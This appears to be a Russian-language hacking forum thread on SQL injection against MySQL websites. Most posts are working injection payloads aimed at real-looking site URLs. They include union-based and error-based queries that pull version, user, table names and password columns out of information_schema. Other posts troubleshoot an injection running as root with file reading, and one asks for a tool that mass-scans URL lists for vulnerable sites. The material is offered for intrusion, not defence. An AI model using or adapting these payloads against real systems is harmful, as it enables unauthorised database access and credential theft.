http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333,concat_ws(0x2F,version(),database(),user()),555,666--+ В сурсе
http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+column_name+LIKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)--++ ну или так, если ты не хочешь колупать сорцы. ps. кури ману.
Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.
2kfor https://forum.antichat.ru/nextnewesttothread56632.html http://forum.antichat.ru/thread45790.html
Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?
Seravin: http://www.site.com/news.php?id=-1+union+select+0,1,group_concat(table_name),2+from+information_schema.tables+where+schema_name='xxx'
функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все по базам - select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'
Если очень нужно, чтоб прямо все разом, нужно воспользоваться циклической процедурой. Подробнее (см. посты #4, #5): https://forum.antichat.net/thread118842.html
инъекция типа селект, пользователь рут, бд mysql5, пути раскрыты. есть читалка, но не полноценная, некоторые файлы не открывает, например, индекс не читает (индекс есть, прочитал .htaccess, управляет mod_rewrite), но пососедству скрипты открывает. не могу писать в файл, даже в тмп. в чем соль? --- еще когда делаешь запрос к information_schema.tables ответа нет от сервера. а при запросе mysql.user и schemata приходит.
не подскажите есть ли в инете скрипт или программа для проверки на уязвимость целого списка url`ов. примерно так - загружаешь урлы из текстовика, а программа их сканирует и выдает уязвимые?
Простите за глупый вопрос но все таки я его снова подниму.... Операционная система Vista. Поиска WI FI сетей и там находит безымянную сеть не зашифрованную.... Как к ней подключиться и узнать ее имя? Другой операционки нету и поставить нет возможности(
Или можно устроить конкатенацию полями HTML: select group_concat(field) from (select concat_ws(0x3a,table_name) as field from information_schema.tables limit 0,20 ) as t
Имеется иньекция, при подставлени кавычки выдает следующее: Code: select surname, name, patronymic from people where id = 851' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 4 Проверяю: Code: +and+1=1 Code: +and+1=2 В первом случае выводит, во втором пусто, -> иньекция Составляю запрос вида: Code: +union+select+1,2,3+--+ В ответ получаю: Code: [B]select *[/B] from people where id = 851 union select 1,2,3 -- The used SELECT statements have a different number of columns Почему во втором запросе исчезают значения, которые берет он сам, и что с этим можно сделать?
Так он же раскрывает полностью запрос при подставлении кавычки Code: select surname, name, patronymic from people where id = 851' Впрочем проверяю: Code: +order+by+1 +order+by+1,2 +order+by+1,2,3 Выводит нормально Code: +order+by+1,2,3,4 Code: select surname, name, patronymic from people where id = 851 order by 1,2,3,4 Unknown column '4' in 'order clause'
Ну значит может быть там данные подставляются в два запроса. Можно заюзать крутой способ Qwazar'а. http://forum.antichat.ru/threadnav119047-2-10.html
